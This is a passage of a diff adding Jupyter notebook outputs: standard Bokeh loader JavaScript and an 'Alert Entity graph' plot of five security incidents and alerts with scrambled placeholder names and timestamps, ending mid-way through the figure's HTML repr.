css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1942\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"2481655c-7e81-41bf-8791-ce7f3dd831dc\" data-root-id=\"1943\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"d7139851-a04c-4210-ab4c-08046516653b\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"1954\"}],\"center\":[{\"id\":\"1957\"},{\"id\":\"1961\"},{\"id\":\"1993\"},{\"id\":\"1994\"},{\"id\":\"1995\"},{\"id\":\"1996\"},{\"id\":\"1997\"},{\"id\":\"1998\"},{\"id\":\"1999\"},{\"id\":\"2000\"},{\"id\":\"2001\"},{\"id\":\"2002\"}],\"height\":800,\"left\":[{\"id\":\"1958\"}],\"renderers\":[{\"id\":\"1978\"}],\"title\":{\"id\":\"1944\"},\"toolbar\":{\"id\":\"1969\"},\"width\":800,\"x_range\":{\"id\":\"1946\"},\"x_scale\":{\"id\":\"1950\"},\"y_range\":{\"id\":\"1948\"},\"y_scale\":{\"id\":\"1952\"}},\"id\":\"1943\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1968\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1950\",\"type\":\"LinearScale\"},{\"attributes\":{\"formatter\":{\"id\":\"2093\"},\"major_label_policy\":{\"id\":\"2092\"},\"ticker\":{\"id\":\"1959\"}},\"id\":\"1958\",\"type\":\"LinearAxis\"},{\"attributes\":{\"text\":\"Alert: qdbbijed\",\"text_font_size\":\"10pt\",\"x\":-1.3248762102494573,\"x_offset\":5,\"y\":1.1894287624019313,\"y_offset\":5},\"id\":\"1994\",\"type\":\"Label\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1948\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2109\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1967\",\"type\":\"HelpTool\"},{\"attributes\":{},\"id\":\"2110\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"text_font_size\":\"10pt\",\"x\":-1.8772444927857692,\"x_offset\":5,\"y\":-0.7528970954662807,\"y_offset\":5},\"id\":\"1995\",\"type\":\"Label\"},{\"attributes\":{\"data_source\":{\"id\":\"1980\"},\"glyph\":{\"id\":\"1988\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1982\"}},\"id\":\"1981\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1946\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2092\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis\":{\"id\":\"1954\"},\"ticker\":null},\"id\":\"1957\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2093\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"1976\",\"type\":\"HoverTool\"},{\"attributes\":{\"axis\":{\"id\":\"1958\"},\"dimension\":1,\"ticker\":null},\"id\":\"1961\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2111\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2100\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"1959\",\"type\":\"BasicTicker\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"1985\"},\"inspection_policy\":{\"id\":\"2099\"},\"layout_provider\":{\"id\":\"1987\"},\"node_renderer\":{\"id\":\"1981\"},\"selection_policy\":{\"id\":\"2100\"}},\"id\":\"1978\",\"type\":\"GraphRenderer\"},{\"attributes\":{},\"id\":\"2099\",\"type\":\"NodesOnly\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1962\"},{\"id\":\"1963\"},{\"id\":\"1964\"},{\"id\":\"1965\"},{\"id\":\"1966\"},{\"id\":\"1967\"},{\"id\":\"1976\"}]},\"id\":\"1969\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"text_font_size\":\"10pt\",\"x\":0.6818685543887336,\"x_offset\":5,\"y\":-1.6785596236830196,\"y_offset\":5},\"id\":\"2001\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1962\",\"type\":\"PanTool\"},{\"attributes\":{\"formatter\":{\"id\":\"2106\"},\"major_label_policy\":{\"id\":\"2105\"},\"ticker\":{\"id\":\"1955\"}},\"id\":\"1954\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1963\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1955\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1965\",\"type\":\"SaveTool\"},{\"attributes\":{\"text\":\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"text_font_size\":\"10pt\",\"x\":1.095604485822148,\"x_offset\":5,\"y\":1.724112984932021,\"y_offset\":5},\"id\":\"2000\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1966\",\"type\":\"ResetTool\"},{\"attributes\":{\"text\":\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"text_font_size\":\"10pt\",\"x\":1.1461138627963827,\"x_offset\":5,\"y\":1.4861248256362514,\"y_offset\":5},\"id\":\"1999\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"2105\",\"type\":\"AllLabels\"},{\"attributes\":{\"text\":\"Alert: naebofkqlmonbrmloaonffmdjipln\",\"text_font_size\":\"10pt\",\"x\":1.4501021793647468,\"x_offset\":5,\"y\":-0.004568474622077024,\"y_offset\":5},\"id\":\"1998\",\"type\":\"Label\"},{\"attributes\":{\"data\":{\"end\":[\"Alert: qdbbijed\",\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Alert: naebofkqlmonbrmloaonffmdjipln\",\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"start\":[\"Incident: qdbbijed\",\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Incident: naebofkqlmonbrmloaonffmdjipln\",\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"]},\"selected\":{\"id\":\"2111\"},\"selection_policy\":{\"id\":\"2112\"}},\"id\":\"1984\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"overlay\":{\"id\":\"1968\"}},\"id\":\"1964\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1983\",\"type\":\"MultiLine\"},{\"attributes\":{},\"id\":\"2112\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"text_font_size\":\"10pt\",\"x\":0.4525365426662028,\"x_offset\":5,\"y\":-1.7614256211780464,\"y_offset\":5},\"id\":\"2002\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Incident: qdbbijed\",\"text_font_size\":\"10pt\",\"x\":-1.1496615073482244,\"x_offset\":5,\"y\":0.9954652482387912,\"y_offset\":5},\"id\":\"1993\",\"type\":\"Label\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"1988\",\"type\":\"Circle\"},{\"attributes\":{\"text\":\"Incident: naebofkqlmonbrmloaonffmdjipln\",\"text_font_size\":\"10pt\",\"x\":1.525556585345237,\"x_offset\":5,\"y\":-0.23432035605513873,\"y_offset\":5},\"id\":\"1997\",\"type\":\"Label\"},{\"attributes\":{\"data\":{\"color\":[\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\"],\"description\":[\"2021-10-01T17:52:21.5763494Z - qdbbijed - lciaqlfodrimcjjcckdppidjrnoobqllnafe\",\"qdbbijed - ['alfojbqollofnjoiboaacndnkceqjmfbmrpq']\",\"2021-10-01T17:44:44.4768467Z - mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela - nmejajbiqrpqkqlbjqedrrqndlmrppldoibd\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela - ['ffrromboaamlmjmlmopefnldpbklbeqqirqm']\",\"2021-10-01T17:29:50.1999887Z - naebofkqlmonbrmloaonffmdjipln - ppffjqndimadciqjqqkakaabjabcfbilraeb\",\"naebofkqlmonbrmloaonffmdjipln - ['rlklbkeeqiekrkkjbkqfebkdcamjknpnparl']\",\"2021-10-01T16:52:35.8429041Z - qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp - dbkkfqcdnbciapjajpbdbimroidmfqljfmjd\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp - ['lfrdecrklremkcioileamdelqdiirmrrmlkp']\",\"2021-10-01T16:49:43.6929517Z - ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje - ppfnqmqlakpmqcnnnniofmjoomenilncrqfj\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje - ['aamkfdroimrrliaqkleppqkbijprdfmoecfe']\"],\"end_time\":[\"2021-10-01T16:01:48.872Z\",null,\"2021-10-01T15:09:54.128Z\",null,\"2021-10-01T17:24:44.6661059Z\",null,\"2021-10-01T16:11:23.6728107Z\",null,\"2021-10-01T16:44:38.190647Z\",null],\"entitytype\":[\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\"],\"index\":[\"Incident: qdbbijed\",\"Alert: qdbbijed\",\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Incident: naebofkqlmonbrmloaonffmdjipln\",\"Alert: naebofkqlmonbrmloaonffmdjipln\",\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"name\":[\"qdbbijed\",\"qdbbijed\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"naebofkqlmonbrmloaonffmdjipln\",\"naebofkqlmonbrmloaonffmdjipln\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"node_color\":[\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\"],\"node_type\":[\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\"],\"source\":[null,\"{ 'AdditionalData': {'ID': 'alfojbqollofnjoiboaacndnkceqjmfbmrpq', 'Name': 'qdbbijed'},\\n  'DisplayName': 'qdbbijed',\\n  'SystemAlertIds': ['alfojbqollofnjoiboaacndnkceqjmfbmrpq'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'ffrromboaamlmjmlmopefnldpbklbeqqirqm',\\n                      'Name': 'mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela'},\\n  'DisplayName': 'mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela',\\n  'SystemAlertIds': ['ffrromboaamlmjmlmopefnldpbklbeqqirqm'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'rlklbkeeqiekrkkjbkqfebkdcamjknpnparl',\\n                      'Name': 'naebofkqlmonbrmloaonffmdjipln'},\\n  'DisplayName': 'naebofkqlmonbrmloaonffmdjipln',\\n  'SystemAlertIds': ['rlklbkeeqiekrkkjbkqfebkdcamjknpnparl'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'lfrdecrklremkcioileamdelqdiirmrrmlkp',\\n                      'Name': 'qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp'},\\n  'DisplayName': 'qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp',\\n  'SystemAlertIds': ['lfrdecrklremkcioileamdelqdiirmrrmlkp'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'aamkfdroimrrliaqkleppqkbijprdfmoecfe',\\n                      'Name': 'ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje'},\\n  'DisplayName': 'ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje',\\n  'SystemAlertIds': ['aamkfdroimrrliaqkleppqkbijprdfmoecfe'],\\n  'Type': 'alerts',\\n  'edges': set()}\"],\"start_time\":[\"2021-09-30T12:01:34.374Z\",null,\"2021-10-01T15:09:54.128Z\",null,\"2021-09-17T17:24:44.6661059Z\",null,\"2021-10-01T11:11:23.6728107Z\",null,\"2021-09-30T15:44:38.190647Z\",null],\"time_generated\":[\"2021-10-01T17:52:21.5763494Z\",null,\"2021-10-01T17:44:44.4768467Z\",null,\"2021-10-01T17:29:50.1999887Z\",null,\"2021-10-01T16:52:35.8429041Z\",null,\"2021-10-01T16:49:43.6929517Z\",null]},\"selected\":{\"id\":\"2109\"},\"selection_policy\":{\"id\":\"2110\"}},\"id\":\"1980\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"2106\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1984\"}},\"id\":\"1986\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"1984\"},\"glyph\":{\"id\":\"1983\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1986\"}},\"id\":\"1985\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"text\":\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"text_font_size\":\"10pt\",\"x\":-2.0,\"x_offset\":5,\"y\":-0.963360650204433,\"y_offset\":5},\"id\":\"1996\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"1944\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"1980\"}},\"id\":\"1982\",\"type\":\"CDSView\"},{\"attributes\":{\"graph_layout\":{\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\":[0.4525365426662028,-1.7614256211780464],\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\":[-2.0,-0.963360650204433],\"Alert: naebofkqlmonbrmloaonffmdjipln\":[1.4501021793647468,-0.004568474622077024],\"Alert: qdbbijed\":[-1.3248762102494573,1.1894287624019313],\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\":[1.095604485822148,1.724112984932021],\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\":[0.6818685543887336,-1.6785596236830196],\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\":[-1.8772444927857692,-0.7528970954662807],\"Incident: naebofkqlmonbrmloaonffmdjipln\":[1.525556585345237,-0.23432035605513873],\"Incident: qdbbijed\":[-1.1496615073482244,0.9954652482387912],\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\":[1.1461138627963827,1.4861248256362514]}},\"id\":\"1987\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{},\"id\":\"1952\",\"type\":\"LinearScale\"}],\"root_ids\":[\"1943\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"d7139851-a04c-4210-ab4c-08046516653b\",\"root_ids\":[\"1943\"],\"roots\":{\"1943\":\"2481655c-7e81-41bf-8791-ce7f3dd831dc\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1943"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1943', <span id=\"2236\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='1954', ...)],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='1957', ...), Grid(id='1961', ...), Label(id='1993', ...), Label(id='1994', ...), Label(id='1995', ...), Label(id='1996', ...), Label(id='1997', ...), Label(id='1998', ...), Label(id='1999', ...), Label(id='2000', ...), Label(id='2001', ...), Label(id='2002', ...)],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='1958', ...)],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: 